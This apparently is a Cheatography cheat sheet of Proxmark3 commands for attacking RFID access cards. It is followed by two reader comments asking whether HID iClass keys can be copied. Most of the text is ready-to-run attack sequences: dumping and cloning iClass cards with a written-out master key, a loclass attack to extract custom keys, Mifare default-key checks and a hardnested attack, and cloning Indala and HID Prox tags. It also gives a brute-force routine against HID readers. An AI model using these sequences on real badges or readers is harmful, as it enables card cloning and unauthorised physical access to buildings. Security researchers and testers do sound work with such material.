Cheatography
https://cheatography.com
iClass
Reverse Permute Master Key | hf iclass permute r 3F90EBF0910F7B6F
Simulate Reader |
Dump | hf iclass dump k AFA785A7DAB33378
Read Block | hf iclass readblk b 7 k AFA785A7DAB33378
Write to Block | hf iclass writeblk b 07 d 6ce099fe7e614fd0 k AFA785A7DAB33378
Print Keystore |
Add Key to Keystore [0-7] | hf iclass managekeys n 0 k AFA785A7DAB33378
Encrypt Block | hf iclass encryptblk 0000000f2aa3dba8
Load Dump | hf iclass eload f iclass_tagdump-filename.bin
Simulate |
Simulation notes:
0 <CSN> simulate the given CSN
1 simulate default CSN
3 Full simulation using emulator memory
Simulate iClass Sequence
pm3 > hf iclass dump k AFA785A7DAB33378
pm3 > hf iclass eload f iclass_tagdump-db883702f8ff12e0.bin
pm3 > hf iclass sim 3
Clone iClass Legacy Sequence
pm3 > hf iclass readblk b 7 k AFA785A7DAB33378
pm3 > hf iclass writeblk b 07 d 6ce099fe7e614fd0 k AFA785A7DAB33378
iClass loclass attack
Extract custom iClass key (loclass attack)
pm3 > hf iclass sim 2
pm3 > hf iclass loclass f iclass_mac_attack.bin
pm3 > hf iclass dump k <Kcus> e
Verify custom iClass key
pm3 > hf iclass lookup u 010a0ffff7ff12e0 p feffffffffffffff m 66348979153c41b9 f default_iclass_keys.dic e
Generic Commands
High Frequency Search |
Low Frequency Search |
Measure Antenna Characteristics |
Check Version |
Check overall status |
Mifare
Check for Default Keys | hf mf chk *1 ? d default_keys.dic
Dump (0=Mini, 1=1k, 2=2k, 4=4k) |
Write to Block | hf mf wrbl 0 A FFFFFFFFFFFF d3a2859f6b880400c801002000000016
Hardnested Attack | hf mf hardnested 0 A FFFFFFFFFFFF 0 A w
Load Dump |
Simulate |
Run autopwn |
Simulate Mifare Sequence
pm3 > hf mf chk *1 ? d default_keys.dic
pm3 > hf mf dump 1
pm3 > script run dumptoemul -i dump.bin
pm3 > hf mf eload 353C2AA6
pm3 > hf mf sim u 353c2aa6
Clone Mifare 1K Sequence
pm3 > hf mf chk *1 ? d default_keys.dic
pm3 > hf mf dump
pm3 > hf mf restore 1 u 4A6CE843 k hf-mf-A29558E4-key.bin f hf-mf-A29558E4-data.bin
Indala
Read |
Demodulate |
Simulate | lf indala sim a0000000c2c436c1
Clone to T55x7 | lf indala clone a0000000c2c436c1
Lua Scripts
List Scripts |
Convert .bin to .eml | script run dumptoemul -i filename.bin
Format Mifare card | script run formatMifare -k FFFFFFFFFFFF -n FFFFFFFFFFFF -x
Options
---
k <key> : the current six byte key
n <key> : the new key
a <access> : the new access bytes
x : execute the commands
HID Prox
Read |
Demodulate |
Simulate |
Clone to T5577 |
Convert Site & Facility code to Wiegand |
Brute force HID reader
Options
---
a <format> : 26|33|34|35|37|40|44|84
f <FC> : 8-bit value, facility code
c <CN> : (optional) Starting Number, max 65535
d <delay> : delay in ms. Default 1000ms
v : verbose logging, show all tries
---
pm3 > lf hid brute a 26 f 224
pm3 > lf hid brute v a 26 f 21 c 200 d 2000
Raw Data
Get samples |
Save samples |
Load samples |
Hitag
Read Hitag information |
Act as Hitag reader |
Sniff Hitag traffic |
Simulate | lf hitag sim c378181c_a8f7.ht2
Write to Block | lf hitag writer 24 499602D2 1 00000000
Simulate Hitag2 sequence
pm3 > lf hitag reader 21 56713368
pm3 > lf hitag sim c378181c_a8f7.ht2
T55XX
Detect T55XX |
Demodulation Config |
Write to Block | lf t55xx wr b 0 d 00081040
Factory Reset Tag |
Modulation Types
<FSK|FSK1|FSK1a|FSK2|FSK2a|ASK|PSK1|PSK2|NRZ|BI|BIa>
EM is ASK
HID Prox is FSK
Indala is PSK
Created By
https://lewys.eu
Comments
tony H, 19:44 30 Aug 20
Hi there,
I ask about PM3.
In China, PM3 sellers said it is not copying HID iClass key.
But you wrote possible.
So I am confused.
Please tell me: using PM3, is iClass key copying possible?
tony H, 09:01 1 Sep 20
Hi, I need information.
PM3, is it possible to copy or read/write HID iClass key code?
Sellers said impossible,
so I am confused by wrong information.
Please tell me correct information.